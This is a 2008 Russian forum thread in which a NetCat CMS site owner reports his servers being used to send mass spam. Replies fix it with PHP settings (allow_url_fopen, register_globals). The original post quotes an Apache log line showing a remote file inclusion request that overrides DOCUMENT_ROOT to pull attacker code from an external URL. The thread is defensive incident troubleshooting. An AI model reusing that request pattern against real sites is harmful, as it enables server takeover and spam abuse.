форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка

Вариант для распечатки		Пред. тема | След. тема
Форумы WEB технологии (Public)
Изначальное сообщение		[ Отслеживать ]

"Спамят через скрипт //index.php?_SERVER%5bDOCUMENT_ROOT - CM..."

Сообщение от sdelali on 14-Июл-08, 16:16

Приветствую! Обнаружилась следующая проблема на сайтах использующих NetCat Small Business: Отсылается 200 тыс. писем спама через сайты на сервере. Сначала подумал что это бот спамит через форму обратной связи (несмотря на капчу). Проверив и отключив раздел Обратная связь выяснил что поток писем валится дальше. Решил проверить access.log апача и увидел сотни вот таких запросов с разных IP. 91.121.24.157 - - [14/Jul/2008:15:49:15 +0400] "POST //index.php?_SERVER[DOCUMENT_ROOT]=http://geocities.com/abugag/inbox.txt? HTTP/1.1" 404 22531 "http://www.мойдомен.ru//index.php?_SERVER[DOCUMENT_ROOT]=http://geocities.com/abugag/inbox.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" Т. е. видно что через подмену DOCUMENT_ROOT выполняется такой код - http://geocities.com/abugag/inbox.txt Пробовал и специальный s_extract.inc.php подключать, и документ рут прописывать явно - не помогает. Может в php.ini какую то функцию отключить можно, запрещающую выполнять код на чужом сайте? Пока отключил функцию mail совсем - т. к. забивался maillog - место заканчивалось - и БД MySQl поверждались ((( Обсуждение также на офсайте CMS - http://netcat.ru/support/ncforum/?Subdiv_ID=1&Topic_ID=813

Высказать мнение | Ответить | Правка | Cообщить модератору

Сообщения по теме

[Сортировка по времени | RSS]

1. "Спамят через скрипт //index.php?_SERVER%5bDOCUMENT_ROOT - CM..."

Сообщение от zeiter (ok) on 14-Июл-08, 16:25

Для PHP4 ставим в php.ini: allow_url_fopen = Off Для PHP5 ставим в php.ini: allow_url_fopen = Off и/или allow_url_include = Off Можно к этому добавить еще safe_mode = On Но прежде всего (я так полагаю, что включены "глобальные") выключить: register_globals = Off

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	2. "Спасибо - полегчало"
	Сообщение от sdelali on 16-Июл-08, 12:28
	При отключенных safe_mode и register_globals CMS не работает, а вот указанная zeiter функция allow_url_fopen = Off в php.ini помогла решить проблему. Во всяком случае процессы sendmail запускаются, но спам уже не идет. Респект за быструю помощь!
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	3. "Спасибо - полегчало"
	Сообщение от anonymous (??) on 18-Июл-08, 06:39
	>При отключенных safe_mode и register_globals CMS не работает Выкинь эту CMS.  Ты её в каменном веке нашёл?
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	4. "Спасибо - полегчало"
	Сообщение от sdelali on 18-Июл-08, 10:27
	> Выкинь эту CMS.  Ты её в каменном веке нашёл? Версия просто старая - Small Business, больше не поддерживается разработчиком - www.netcat.ru А так из альтернатив среди российских CMS - только 1С-Битрикс. Так для него вообще на 1 сайт выделенный сервер нужен. )))
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	5. "Спасибо - полегчало"
	Сообщение от anonymous (??) on 18-Июл-08, 18:52
	>Версия просто старая - Small Business, больше не поддерживается разработчиком - www.netcat.ru Вот видишь, даже разработчик уже забил на эту каку.
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	6. "Спасибо - полегчало"
	Сообщение от Pahanivo (ok) on 23-Июл-08, 07:50
	Тыб вообще почитал на тему "безопасность apache + php", и что такое safe мода и как она работает и зачем вообще нужна, а то изза таких как ты приходится постоянно боротся со спамом.
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить	Индекс форумов | Темы | Пред. тема | След. тема
Оцените тред (1=ужас, 5=супер)? [ 1 | 2 | 3 | 4 | 5 ] [Рекомендовать для помещения в FAQ]